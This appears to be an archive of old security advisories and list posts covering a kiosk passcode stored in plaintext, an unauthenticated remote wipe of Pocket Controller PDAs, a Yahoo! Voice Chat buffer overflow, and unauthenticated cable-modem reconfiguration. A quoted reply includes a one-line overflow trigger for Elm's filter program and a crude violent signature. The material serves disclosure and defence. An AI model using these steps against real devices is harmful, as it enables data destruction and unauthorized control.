Disclaimer: The information in the advisory is believed to be accurate at the 
time of publishing based on currently available information. Use of the 
information constitutes acceptance for use on an AS IS condition. There are no 
warranties with regard to this information. Neither the author nor the 
publisher accepts any liability for any direct, indirect, or consequential loss 
or damage arising from use of, or reliance on, this information.

Airscanner Mobile Security Advisory #0508310 Spb Kiosk Engine Administrator Password & Information Disclosure

2005-12-27 Thread contact . removethis
Airscanner Mobile Security Advisory #05083101:
Spb Kiosk Engine Administrator Password & Information Disclosure (Local)

Kiosk Engine

Tested on Windows Mobile Pocket PC 2003

Mobile device running Windows Mobile Pocket PC with Kiosk Engine 

Seth Fogie
Airscanner Mobile Security
Mobile Antivirus Researchers Association
August 30 2005

Risk Level:
Medium. Local attacker gains unauthorized control over device.

Spb Kiosk Engine allows you to run your custom application(s) in kiosk mode. In 
this mode, the target applications are the only ones that can be used on a 
specific Pocket PC device.

Kiosk Engine allows an administrator to enter their passcode to gain full 
control over a PDA with the Kiosk Engine installed. This passcode is stored in 
the registry as plaintext and can be obtained several different ways (eg. 
remote registry access).


Vendor Response
Waiting response.

Online Advisory: 

Copyright (c) 2005 Airscanner Corp.

Permission is granted for the redistribution of this alert electronically. It 
may not be edited in any way without the express written consent of Airscanner 
Corp. If you wish to reprint the whole or any part of this alert in any other 
medium other than electronically, please contact Airscanner Corp. for 

Disclaimer: The information in the advisory is believed to be accurate at the 
time of publishing based on currently available information. Use of the 
information constitutes acceptance for use on an AS IS condition. There are no 
warranties with regard to this information. Neither the author nor the 
publisher accepts any liability for any direct, indirect, or consequential loss 
or damage arising from use of, or reliance on, this information.

Airscanner Mobile Security Advisory: Remote Hard Reset Data Wipe and DoS of Pocket Controller v5.0 (#AS05080401)

2005-12-08 Thread contact . removethis

Airscanner Mobile Security Advisory: (#AS05080401) (Critical)

Remote Hard Reset Data Wipe and DoS of Pocket Controller v5.0 (#AS05080401)

Date of discovery: August 4, 2005

Pocket Controller-Professional V5 (latest edition)

Windows Mobile .NET, Windows Mobile Pocket PC

Windows Mobile

Jonathan Read (CISSP) and Seth Fogie
Airscanner Mobile Security

Mobile Antivirus Researcher's Association

Medium to High since any PDA running the application can be “hard 
reset” (up to complete loss of all data and installed applications) using 
a remote connection. This vulnerability can also be exploited over a wireless 

Pocket Controller Professional is a popular, powerful remote control and 
management program that allows a user to remotely control a PDA from their PC 
computer. See http://www.soti.net/ for more information. Several feature of 
this program is that it can remotely turn off, reboot, and reset the PDA. We 
discovered that these commands can be performed without the client program 
sending only three packets to the target PDA.

Connect to port 5492 on PDA that is running the target client program. First 
send an initialization packet to the PDA. Next send a packet containing the 
desired command (turn off, reboot, hard reset) to the PDA. Finally, create a 
new socket and reset the intitialization packet. Upon receipt, the PDA will 
perform the selected function. PoC is available for MARA members.

No work around available.

Initial Vendor Notification: August 4, 2005

Initial Vendor Response: Awaiting response.

Copyright (c) 2005 Airscanner Corp.

Permission is granted for the redistribution of this alert electronically. It 
may not be edited in any way without the express written consent of Airscanner 
Corp. If you wish to reprint the whole or any part of this alert in any other 
medium other than electronically, please contact Airscanner Corp. for 

Disclaimer: The information in the advisory is believed to be accurate at the 
time of publishing based on currently available information. Use of the 
information constitutes acceptance for use on an AS IS condition. There are no 
warranties with regard to this information. Neither the author nor the 
publisher accepts any liability for any direct, indirect, or consequential loss 
or damage arising from use of, or reliance on, this information.

This advisory can be viewed online at 

Mobile Antivirus Researchers Assoc. Call for White Papers

2005-12-07 Thread contact . removethis
### Call for White Papers ###

The Journal of Computer Virology in association with the Mobile Antivirus 
Researchers Assoc. invites authors to discuss the state of the art of malware 
and anti-malware technologies and security issues for mobile environments. 
Authors are invited to submit full technical papers of up to 25 pages 
presenting novel and mature research results. Papers will be reviewed and 
papers accepted will be published in a Special Issue of the Journal in Computer 

For more information please visit 

M.A.R.A is a vendor neutral organization with no commercial agenda. Our 
organization is completely non profit and our members come from the global 
community of professional researchers.   

Yahoo! Security Advisory: Yahoo! Voice Chat

2003-06-02 Thread Yahoo!Security Contact
Yahoo! Security Advisory

Subject:Yahoo! Voice Chat Control: buffer overflow
Announced:  2003-05-30
Affects:Yahoo! Audio Conferencing versions prior to 1,0,0,45
running on any version of Microsoft Windows
Corrected:  2003-05-30

1. Background

Yahoo! Audio Conferencing (commonly known as Yahoo! Voice Chat)
is a feature shared by Yahoo! Chat (a web-based service) and
Yahoo! Messenger (a win32 client application).

2. Problem Description

A buffer overflow exists in the Yahoo! Audio Conferencing
control that is shared by Yahoo! Messenger and Yahoo! Chat.

3. Impact

It may be possible for a remote attacker who can get a user to
view malicious html code, most likely executed by getting a user
to visit their Web page, to cause the user to be involuntarily
logged out of chat, crash the user's browser, or potentially
introduce executable code. To our knowledge, there have not been
any executable code exploits related to this issue.

4. Solution

An updated Yahoo! Audio Conferencing control must be installed.
The CLSID of the control is 2B323CD9-50E3-11D3-9466-00A0C9700498
and the corrected version number version is 1,0,0,45.

Users can test if they need to upgrade and install the update by
visiting http://messenger.yahoo.com/messenger/security

Yahoo! Messenger users will be prompted to update upon sign-in.
Yahoo! Chat users will be served the new ActiveX control when
entering a chat room.  The update page will also be linked to
from the Yahoo! Chat and Yahoo! Messenger home pages.

5. Workaround

The control can be disabled by removing the object from the
Internet Explorer "Downloaded Program Files" cache and, if
Yahoo! Messenger is installed, going into the Yahoo! Messenger
directory (by default, C:\Program Files\Yahoo!\Messenger\) and
running the following command:

  regsvr32 /u yacscom.dll

6. Acknowledgments

Cesar <[EMAIL PROTECTED]> discovered and reported this vulnerability.

Description: PGP signature

KSR[T] Advisories #012: Hybrid Network's Cable Modems

1999-10-06 Thread KSR[T] Contact Account

KSR[T] Security Advisories http://www.ksrt.org
Contact Account:   [EMAIL PROTECTED]
Advisory Subscription: Send an empty message to:

  KSR[T] Advisory #012
  Date:  Oct.  6  1999
  ID #:  hybr-hsmp-012

Affected Program:Hybrid Network's Cable Modems

Author:  David Goldsmith <[EMAIL PROTECTED]>

Summary: Remote attackers can anonymously reconfigure any
 Hybrid Network's cable modem that is running HSMP.
 This can be used to steal information and
 login/password pairs from cable modem users.

Problem Description: Hybrid Network's cable modems can be configured via
 a UDP based protocol called HSMP.  This protocol
 does not require any authentication to perform
 configuration requests.  Since UDP is easily spoofed,
 configuration changes can made anonymously.

Compromise:  There are a plethora of denial of services attacks
 involving bad configuration settings (ethernet
 interfaces set to non-routable IP addresses, et al).
 HSMP can also be used to configure the DNS servers
 used by cable modem users, allowing attackers to
 redirect cable modem subscribers to a trojan site.

 More complex and theoretical attacks could involve
 the running of actual code through the debugging
 interface.  This might allow remote attackers to
 deploy ethernet sniffers on the cable modem.

Notes:   KSR[T] found this vulnerability in parallel with
 Paul S. Cosis <[EMAIL PROTECTED]> and the l0pht.  We
 would like to thank them for their input to this

Patch/Fix:   Cable providers should block out HSMP traffic
 (/udp) on their firewalls.

Links:   KSR[T] had initially written a demonstration
 HSMP client which is located at:


 There is also another HSMP client located at:


 l0pht modified the above client and added
 the ability to spoof the source address, allowing
 for the anonymous reconfiguration of Hybrid cable
 modems). Their client is located at:


Re: your mail

1999-09-12 Thread KSR[T] Contact Account

This bug was initially found a year and a half ago.  Please refer to
http://www.ksrt.org/adv7.html.  Filter is no longer a supported
application and should not be used.


On Thu, 9 Sep 1999, Mark Ultor wrote:

> I've found a bug in filter on Elm 2.4 PL25. filter got SGID on mail group.
> sowatech:~$ filter -f `perl -e ' print "A" x 5000'`
> Segmentation fault
> btw in elm bugs r everywhere  better don't use it
> Greeetz
> ___
> Ultor [[EMAIL PROTECTED]] - Network Security Adviser
>  " I hack the heads of little girls and put them on my wall "
> --
> Wyslano za pomoca systemu Web Mail System.
> http://www.sowatech.com.pl/